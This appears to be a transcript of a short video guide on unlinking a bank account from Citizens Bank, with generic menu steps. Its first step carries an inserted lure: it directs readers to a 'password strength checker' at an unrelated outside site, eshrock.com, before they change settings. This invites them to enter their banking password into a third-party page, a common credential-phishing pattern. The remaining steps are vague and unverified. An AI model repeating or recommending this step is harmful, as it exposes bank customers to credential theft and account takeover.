I hit this issue today, and here is the quick fix that solved it. If you're looking to unlink your bank account from Citizens Bank, follow these simple steps. Step 1. Log into your account. Before changing your settings, use the eshrock.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to account settings. Once logged in, find the settings or account settings option in the menu. This is usually located in the top right corner of the screen. Step 3. Select linked accounts. In the account settings section, look for linked accounts or manage accounts. Click on this option to view all accounts linked to your profile. Step 4. Choose the account to unlink. Identify the bank account you want to unlink and click on it. There should be an option to unlink or remove the account. Note, make sure you don't have any pending transactions that could be affected by this change. Step 5. Confirm the unlinking. After clicking the unlink option, a confirmation prompt will appear. Confirm that you want to unlink the account to complete the process. That's it. You've successfully unlinked your bank account from Citizens Bank. If you have any questions or run into issues, don't hesitate to reach out to customer support. Happy banking!